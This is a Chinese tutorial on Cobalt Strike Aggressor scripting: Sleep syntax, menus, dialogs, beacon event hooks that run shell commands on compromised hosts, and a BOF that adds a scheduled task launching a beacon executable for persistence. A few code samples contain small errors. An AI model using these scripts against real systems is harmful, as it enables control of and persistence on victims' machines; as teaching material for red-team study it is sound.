简介
Cobalt Strike的Aggressor脚本(.cna文件)是用一种名为Sleep的脚本语言编写的。Sleep语言是一种简洁的、动态类型的、类似Perl和JavaScript的语言,它被设计用来方便地进行脚本编写和快速原型开发
Sleep语言入门
变量
Sleep使用 $ 符号来定义变量。例如,$x = 5; 将变量 x 的值设置为5
数据类型
Sleep支持多种数据类型,这里主要讲两种,分别是数组(array)和哈希表(hash)
在 Sleep 中,你可以使用 @ 符号来创建数组。Sleep 还提供了一些函数来操作数组,例如 push()(将一个元素添加到数组的末尾)和 size()(获取数组的大小)
哈希表(也称为字典或映射)是一种可以存储键值对的数据结构。在 Sleep 中,你可以使用 % 符号来创建哈希表
创建一个空的数组
$my_array = @();
使用 push 函数将元素添加到数组的末尾
push($my_array, 1);
push($my_array, 2);
push($my_array, 3);
使用 size 函数获取数组的大小
$size = size($my_array); # $size 的值现在是 3
println("Array: " . $my_array); # 打印出 "Array: @(1, 2, 3)"
println("Size: " . $size); # 打印出 "Size: 3"
创建一个空的哈希表
$my_hash = %();
将键值对添加到哈希表
$my_hash['key1'] = 'value1';
$my_hash['key2'] = 'value2';
获取哈希表的所有键和所有值
$keys = keys($my_hash); # $keys 的值现在是 @('key1', 'key2')
$values = values($my_hash); # $values 的值现在是 @('value1', 'value2')
println("Hash: " . $my_hash); # 打印出 "Hash: %(key1 => 'value1', key2 => 'value2')"
println("Keys: " . $keys); # 打印出 "Keys: @('key1', 'key2')"
println("Values: " . $values); # 打印出 "Values: @('value1', 'value2')"
遍历操作
1.遍历数组:你可以使用 foreach 语句来遍历数组,如下所示,这个脚本会打印出数组中的每一个元素
$my_array = @(1, 2, 3, 4, 5);
foreach $element ($my_array) {
println("Element: " . $element);
}
2.遍历哈希表:使用 foreach 语句来遍历哈希表。需要注意的是,遍历哈希表时,每一个元素都是一个键值对,如下代码会打印出哈希表种的每一个键和值
$my_hash = %(key1 => 'value1', key2 => 'value2');
foreach $pair ($my_hash) {
$key = $pair[0];
$value = $pair[1];
println("Key: " . $key . ", Value: " . $value);
}
函数定义
你可以使用 sub 关键字来定义函数,如下代码所示, 在command定义中,$1表示第一个参数;command关键字用于定义一个新的命令,当你aggressor命令行输入MyAdd加参数,命令的代码就会被执行
sub add {
$x = $1;
$y = $2;
return $x + $y;
}
command MyAdd{
$sum = add($1,$2);
println("result=".$sum);
}
aggressor命令行
查看帮助
点击Script Console打开脚本控制台
然后输入help查看命令帮助,我将这些命令及其对应的含义总结在以下表格中了
| 命令 | 描述 |
|---|---|
! |
执行shell命令。! ls将会在你的系统shell中执行ls命令 |
? |
获取关于特定命令的帮助信息。例如,? load将会显示有关load命令的帮助信息 |
e |
执行一段Aggressor脚本。例如,e println('Hello, World!');将会在命令行中打印出Hello, World! |
help |
获取命令行的帮助信息 |
history |
查看命令历史 |
load |
加载一个Aggressor脚本(.cna文件) |
ls |
列出当前已加载的Aggressor脚本 |
proff |
关闭Aggressor的性能分析 |
profile |
显示Aggressor的性能分析结果 |
pron |
开启Aggressor的性能分析 |
reload |
重新加载所有已经加载的Aggressor脚本 |
troff |
关闭Aggressor的跟踪功能 |
tron |
开启Aggressor的跟踪功能 |
unload |
卸载一个已加载的Aggressor脚本 |
x |
用于执行一个表达式并返回结果 |
加载脚本
在aggressor命令行执行load命令加载cna文件,以下是一个简单的字符串输出脚本代码。输入myprint,控制台输出“hello world”
command myprint{
println("hello world");
}
除此之外,在CS的文件目录还有一个agscript文件,它用于运行Aggressor脚本(.cna文件)。你可以使用agscript来启动一个新的Cobalt Strike客户端,连接到一个Cobalt Strike团队服务器,并运行一个或多个Aggressor脚本,agscript的基本用法如下:
agscript [options] <host> <port> <user> <pass> <script> [<script> ...]
<host>、<port>、<user>和<pass>用于指定要连接的Cobalt Strike团队服务器的详细信息。<script>参数用于指定要运行的Aggressor脚本。你可以指定一个或多个脚本
例如,你可以使用以下命令来运行一个名为my_script.cna的Aggressor脚本。这将会启动一个新的Cobalt Strike客户端,连接到运行在本地(127.0.0.1)的Cobalt Strike团队服务器,然后运行my_script.cna脚本
agscript 127.0.0.1 50050 myuser mypass my_script.cna
设置输出字体颜色
在Aggressor脚本中,可以使用 \c 跟随一个数字来改变接下来的文本颜色,以下是\c 后跟随的数字与颜色的对应关系:
| 默认颜色 | 黑色 | 红色 | 绿色 | 黄色 | 蓝色 | 白色 |
|---|---|---|---|---|---|---|
| \c0 | \c1 | \c2 | \c3 | \c4 | \c5 | \c8 |
println("\c2This text is red.");
println("\c3This text is green.");
println("\c4This text is yellow.");
println("\c0This text is default color.");
CNA常用操作
绑定快捷键
使用关键字bind来绑定快捷键,以此执行指定的功能,如下代码绑定了快捷键Ctrl+H,当按了快捷键后会弹框提示“Hello World!”
bind Ctrl+H {
show_message("Hello World!"); # 弹窗
}
菜单编写
1**.定义菜单**:使用popup函数定义一个新的菜单,如下所示,这将定义一个名为my_menu的新菜单
popup my_menu {
# 菜单项将在这里定义
}
2.添加菜单项 :在 popup 块内部,使用 item 函数添加菜单项。如下所示,将在 my_menu 菜单中添加两个菜单项,名为 “Menu Item 1” 和 “Menu Item 2”,当这些菜单项被点击时,会在控制台中打印相应的消息
popup my_menu {
item("Menu Item 1", { println("You clicked Menu Item 1"); });
separator();
item("Menu Item 2", { println("You clicked Menu Item 2"); });
}
3.添加菜单到菜单栏:使用 menubar 函数将你的菜单添加到 Cobalt Strike 的菜单栏中,这将在菜单栏中添加一个新的菜单,名为 “My Menu”,当你点击这个菜单时,会显示你之前定义的 my_menu 菜单
popup my_menu {
item("Menu Item 1", { println("You clicked Menu Item 1"); });
separator();
item("Menu Item 2", { println("You clicked Menu Item 2"); });
}
menubar("My Menu", "my_menu");
如果你不想在菜单栏上创建新的菜单,而是想在默认的菜单上添加菜单项,例如你想在Help菜单添加菜单项,你可以这样做:
popup help {
item("关于作者信息:", {
show_message("作者是个大帅哥!") });
sparator();
}
使用popup函数并指定beacon_bottom 作为参数可以在右键单击 Beacon 会话时添加一个自定义的上下文菜单
popup beacon_bottom{item("打开百度", {url_open("https://www.baidu.com"); });}
还可以通过menu语句来创建多级菜单,menu语句中还能再嵌套一个menu语句
popup beacon_bottom {
menu "beacon菜单" {
menu "子菜单一" {
item("子子菜单一", {
show_message("这是子子菜单一"); });
item("子子菜单二", {
show_message("这是子子菜单二"); });
}
item("子菜单二", {
show_message("这是子菜单二"); });
}
}
编写对话框
以下代码编写了一个对话框,用于实现数据交互
在Beacon的右键菜单中添加一个新的菜单项 "添加用户",当这个菜单项被点击时,调用 mydialog 子程序。
popup beacon_bottom {
item("添加用户", {
mydialog(); }); }
这是一个回调函数,当对话框关闭时,会被调用。
它接收三个参数:对话框的引用,按钮的名称,以及一个包含用户输入的哈希表。
sub callback {
show_message("用户添加成功!\n"."dialog的引用是:".$1."\n按钮名称是:".$2);
println("用户名是:".$3["user"]."\n密码是:".$3["password"]."\n用户类型是: ".$3["user_type"]);# 这里callback函数接收到了dialog传递过来的三个参数
}
这是一个子程序,用于创建一个对话框,让用户输入用户名和密码。
它使用 dialog 函数创建一个对话框,设置了默认值,指定了回调函数。
它使用 drow_text 函数添加一个密码输入框。
它使用 dbutton_action 函数添加一个动作按钮,当用户点击这个按钮时,会触发回调函数。
它使用 dbutton_help 函数添加一个帮助按钮,当用户点击这个按钮时,会打开 http://www.baidu.com 网页。
最后,使用 dialog_show 函数显示对话框。
sub mydialog {
$info = dialog("对话框的标题", %(user => "Administrator", password => ""), &callback);
drow_text($info, "user", "输入用户账号");
drow_text($info, "password", "输入用户密码");
drow_combobox($info,"user_type","用户类型",@("普通用户","管理员"));
dbutton_action($info, "添加用户"); # 点击按钮,触发回调函数
dbutton_help($info, "http://www.baidu.com"); # 显示帮助信息
dialog_show($info); # 显示对话框
}
以下是编写对话框常用到的一些函数:
dialog 函数在 Aggressor 脚本中用于创建一个新的对话框,以用来显示消息,获取用户输入,或执行其他与用户交互的任务,基本语法如下(注意,虽然 dialog 函数创建了一个对话框,但它并不会立即显示这个对话框。要显示对话框,你需要使用 dialog_show 函数):
dialog(<标题>, <默认值>, <回调函数>)
<标题>是一个字符串,用于设置对话框的标题。<默认值>是一个哈希表,用于设置对话框中各个字段的默认值。<回调函数>是一个函数,当对话框被关闭时,这个函数将被调用,对话框中用户输入的值将作为参数传递给这个函数
drow_text 函数用于在对话框中添加一个文本输入框。其基本语法如下
drow_text(<对话框>, <字段名>, <提示文本>)
这个函数接受三个参数:对话框(通过 dialog 函数创建),字段名(用于标识文本输入框),和提示文本(显示在文本输入框旁边的文本
dbutton_action 函数用于在对话框中添加一个动作按钮。当用户点击这个按钮时,会触发对话框的回调函数。这个函数接受两个参数:对话框(通过 dialog 函数创建)和按钮文本(显示在按钮上的文本)
dbutton_action(<对话框>, <按钮文本>)
dbutton_help 函数用于在对话框中添加一个帮助按钮。当用户点击这个按钮时,会在默认的网页浏览器中打开一个网页。其基本语法是
dbutton_help(<对话框>, <网址>)
drow_combobox函数用于在对话框中添加一个下拉列表(也称为组合框或combobox)。其基本语法如下:
drow_combobox($dialog, $key, $label, @options);
$dialog是对话框的引用,通常是通过dialog函数创建的。$key是一个字符串,用于标识这个下拉列表。当用户在下拉列表中选择一个选项时,这个选项的值会被存储在对话框的数据中,可以通过这个键来访问。$label是一个字符串,用于显示在下拉列表旁边的标签。@options是一个数组,包含了下拉列表中的所有选项。
数据模型
Cobalt Strike的数据模型提供了一组功能,通过这些功能,你可以查询和操作Cobalt Strike中存储的各种数据。这包括目标信息、凭证、下载的文件、键盘记录等。这些功能通过一系列的函数提供,你可以在Aggressor脚本中使用这些函数
以下是一些常用的数据接口:
- targets:用于查询和操作Cobalt Strike中存储的目标信息。
- archives:用于查询Cobalt Strike最近的活动信息。
- beacons:用于查询和操作Cobalt Strike中的Beacon会话。Beacon是Cobalt Strike的一个轻量级恶意软件,可以在受感染的主机上运行,并与团队服务器通信。
- credentials:用于查询和操作Cobalt Strike存储的凭证信息。这些凭证可能是攻击者从目标系统上获取的密码、哈希值或Kerberos票据。
- downloads:用于查询和操作Cobalt Strike下载的文件。
- keystrokes:用于查询Cobalt Strike记录的键盘输入。
- screenshots:用于查询Cobalt Strike获取的屏幕截图。
- sites:这用于查询和操作Cobalt Strike托管的资产,例如监听器和stagers。
- servers:用于查询和操作Cobalt Strike的团队服务器。
如下是使用targets函数查询beacon数据的实例:
x targets():这个命令返回了一个数组,数组中的每个元素都是一个哈希表,代表了一个目标。哈希表中包含了目标的地址(‘address’)、操作系统(‘os’)、主机名(‘name’)和版本(‘version’)。x targets()[0]:这个命令返回了数组中的第一个元素,也就是第一个目标的信息。x targets()[0]['address']:这个命令返回了第一个目标的地址。
Beacon
目标主机上线后,C2会为其分配一个唯一的随机数ID,我们可使用beacon_ids()来获取所有会话的ID
x beacon_ids()
获取到会话ID后,可使用beacon_info()来获取指定会话的所有数据
x beacon_info(beacon_ids()[0])
当然你还可以使用beacons()来获取所有会话的所有信息
beacon_initial是Cobalt Strike的Aggressor脚本中的一个预定义事件。当一个新的Beacon首次上线时,这个事件就会被触发,并返回一个会话ID($1)
如下代码所示, 它会在新的Beacon首次上线时弹出一个消息框,显示Beacon的一些基本信息
当新的Beacon首次上线时
on beacon_initial {
# 获取Beacon的ID
$beacon_id = $1;
# 获取Beacon的一些基本信息
$user = beacon_info($beacon_id, "user");
$host = beacon_info($beacon_id, "host");
$pid = beacon_info($beacon_id, "pid");
$os = beacon_info($beacon_id, "os");
# 构造要显示的消息
$message = "新的Beacon上线!\n\n";
$message = $message . "User: " . $user . "\n";
$message = $message . "Host: " . $host . "\n";
$message = $message . "PID: " . $pid . "\n";
$message = $message . "OS: " . $os . "\n";
# 显示消息框
show_message($message);
}
binput函数实际上是将字符串发送到Beacon的命令行, 其第一个参数是beacon的ID, 第二个参数是你想要输出至beacon命令行的字符串
当新的Beacon首次上线时
on beacon_initial {
# 获取Beacon的ID
$beacon_id = $1;
binput($beacon_id, "有一个beacon上线了");
}
bshell函数用于在指定的beacon会话执行一个shell命令
当新的Beacon首次上线时
on beacon_initial {
# 获取Beacon的ID
$beacon_id = $1;
binput($beacon_id, bshell(beacon_id,"whoami"));
}
与BOF联动
涉及函数
script_resource(path):获取脚本资源的路径,当然不只限于bof(.obj)文件,还可以是exe、cna等等。要注意的是,脚本资源的路径要一定填写相对路径( 相对于cna文件)
openf和readb:打开文件并读取
bofpack:将参数打包成一个字节流,然后传递给BOF中的go函数,其语法格式如下:
bof_pack($beacon_id, "iz", $my_int, $my_string);
其中参数2是格式字符串,用于指定参数的类型,这个字符串可以包含以下字符:
i:表示一个32位整数。I:表示一个64位整数。d:表示一个双精度浮点数。z:表示一个以null结尾的字符串。Z:表示一个以null结尾的宽字符串(即,每个字符由两个字节表示)。
beacon_inline_execute:用于在指定的Beacon中执行一个BOF,该函数接收四个参数:
- 参数一:Beacon的ID,这是一个整数,表示你想要在哪个Beacon中执行BOF。
- 参数二:BOF的内容,这是一个字节流,通常是你从BOF文件中读取的内容。
- 参数三:BOF中的函数名,这是一个字符串,表示你想要执行的函数。
- 参数四:传递给BOF函数的参数,这是一个字节流,通常是你使用
bof_pack函数创建的。
alias:在Cobalt Strike的Aggressor脚本中,command和alias都是用来定义新的命令的,但它们的使用场景是不同的
command函数定义的命令是在Cobalt Strike的脚本控制台中使用的,而alias函数定义的命令是在Beacon的命令行中使用的
使用案例
1.添加计划任务
如下是aggressor脚本代码:
$1 = beacon ID
$2 = task_name
$3 = author
$4 = description
$5 = command
$6 = args
alias boftask {
# 检查参数数量是否正确
if (size(@_) != 6){
berror($1,"boftask: args error");
return;
}
# 打开BOF文件并读取内容
local('$handle $data $args'); #定义了三个局部变量
$handle = openf(script_resource("BofTest.x64.obj")); # 打开BOF文件
$data = readb($handle, -1); # 读取BOF文件的内容
closef($handle); # 关闭BOF文件
# 设置参数
# 使用bof_pack函数将参数打包成一个字节流
# "ZZZZZ"表示我们有五个宽字符串参数,小写的z表示以null结尾的字符串
$args = bof_pack($1, "ZZZZZ", $2, $3, $4, $5, $6);
# 执行BOF
# 使用beacon_inline_execute函数来执行BOF
# "go"是BOF中的函数名,$args是传递给这个函数的参数
beacon_inline_execute($1, $data, "go", $args);
# 向用户通知任务已经开始
# 使用btask函数在Beacon的控制台中显示一条消息
btask($1, "Creating scheduled task as $2");
}
如下是bof的代码,此处我只给出了go函数的代码:
void go(char* buff, int len) {
// datap是BOF框架中定义的结构体,用于解析从Beacon接收到的数据
// 当你在Beacon执行BOF时,可以向BOF传递一些参数,这些参数会被打包成一个字节流
// BOF会使用datap结构体来解析这个字节流,从而获取到传递的参数
datap parser;
// 设置创建的计划任务的相关信息
wchar_t* task_name,
* author,
* description,
* command,
* args;
// 初始化datap结构体变量(parser),用于解析从Beacon接收到的字节流(buff)
BeaconDataParse(&parser, buff, len);
task_name = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取任务名
author = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取作者名
description = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取描述
command = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取要执行的命令
args = (wchar_t*)BeaconDataExtract(&parser, 0); // 提取命令的参数
if (!com_init()) // 初始化COM库
return;
if (!task_create(task_name, author, description, command, args)) // 创建计划任务
return;
CoUninitialize(); // 关闭COM库
}
beacon命令行执行:boftask "test" "henry" "this is bof" "C:\\beacon.exe" ""
查看目标主机的计划任务列表可以发现,计划任务成功添加上了
参考链接
-
https://cloud.tencent.com/developer/article/1785567
-
https://www.bilibili.com/video/BV1pU4y1C7xh/?spm_id_from=333.337.search-card.all.click&vd_source=a6caf742912abf241ffbcb3c11933841
-
https://maka8ka.cc/post/cobaltstrike-bof%E5%8F%8A%E5%AF%B9%E5%BA%94%E7%9A%84cna%E8%84%9A%E6%9C%AC/
-
https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/agressor_script.htm